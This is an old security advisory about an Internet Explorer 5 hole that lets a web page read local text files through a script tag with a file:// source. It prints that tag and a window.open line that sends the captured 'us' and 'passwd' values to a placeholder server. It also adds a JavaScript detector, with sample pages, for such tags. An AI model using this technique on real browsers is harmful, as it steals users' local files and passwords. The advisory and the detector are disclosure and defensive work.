MSIE read textfiles from client's hard disk

    Internet Explorer


    IE 5.x


    Stefaan Deman found the following.  There is a security bug in
    Internet Explorer 5.  It is possible to read some text files
    (other than cookies) from the client's hard disk.  If, for
    example, the directory 'C:\WINNT' contains a text file 'test.txt'
    with content:


    then it is possible to read this file in an HTML page with the tag

        <script src="file:///C:/WINNT/test.txt"></script>

    The HTML page will treat the file as a script, and us and passwd
    in the previous example will be treated as variables.

    It is then possible to use this information or send this (possibly
    critical) information back to the web server with, for example,

         window.open("http://myurl/myasppage.asp?us=" + escape(us) + ";passwd=" +  escape(passwd), "blabla")

    This is a security bug; it should be impossible to read any file
    on the client's file system.  Of course, the file must have
    correct JavaScript or VBScript syntax and the filename must be
    known.  However, it is easy to imagine how this security hole can
    be misused.
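
    A content filter or page review can look for the tag shown above.
    The following is an added example, not code from the advisory; it
    flags script tags whose src points at the local file system.  The
    function names and sample pages are constructed, and treating
    drive-letter and UNC paths as local is an assumption of the example.

```javascript
// Added example, not code from the advisory. All names and the sample
// pages are constructed; drive-letter and UNC handling is an assumption.

// Decode numeric and a few named character references, which could
// otherwise hide the scheme (e.g. "fil&#101;:") from a plain string match.
function decodeEntities(s) {
  const cp = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : '');
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)))
    .replace(/&colon;/gi, ':')
    .replace(/&sol;/gi, '/');
}

// True when a script source resolves to the local file system.
function isLocalSource(src) {
  // Strip tabs/newlines and ignore case so such variants still match.
  const url = decodeEntities(src).replace(/[\t\r\n]/g, '').trim().toLowerCase();
  return url.startsWith('file:')      // file:///C:/WINNT/test.txt
    || /^[a-z]:[\\/]/.test(url)       // C:\WINNT\test.txt
    || url.startsWith('\\\\');        // \\host\share\test.txt
}

// Return the src value of every <script> tag that points at a local file.
function findLocalScriptIncludes(html) {
  const tagRe = /<script\b([^>]*)>/gi;
  const srcRe = /(?:^|\s)src\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/i;
  const hits = [];
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    const attr = srcRe.exec(tag[1]);
    if (!attr) continue;              // inline script, nothing is loaded
    const src = attr[1] ?? attr[2] ?? attr[3];
    if (isLocalSource(src)) hits.push(src);
  }
  return hits;
}

// Constructed sample pages.
const SAMPLES = {
  advisory: '<script src="file:///C:/WINNT/test.txt"></script>',
  unquoted: '<SCRIPT LANGUAGE=VBScript SRC=File:///c:/winnt/test.txt></SCRIPT>',
  encoded: "<script src='fil&#101;&#x3a;///C:/WINNT/test.txt'></script>",
  benign: '<script src="/js/app.js"></script><script data-src="file:///x"></script>',
};

for (const [name, html] of Object.entries(SAMPLES)) {
  console.log(name, findLocalScriptIncludes(html));
}
```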

    This bug isn't as severe as the one posted by Guninski.  The
    difference between this bug and the one of Guninski is that this
    security hole doesn't make use of ActiveX components.

    Victor A. Rodriguez tested it on MSIE 5.1b1 (3408) Preview Release
    for Mac and it is vulnerable.  He also tried Fizzilla (Mozilla
    ported to Mac OS X) and it didn't work.

    IE 4.0 reports:

        Cannot open C:\WINNT\Profiles\<user>\Desktop\test.htm


    Nothing yet.

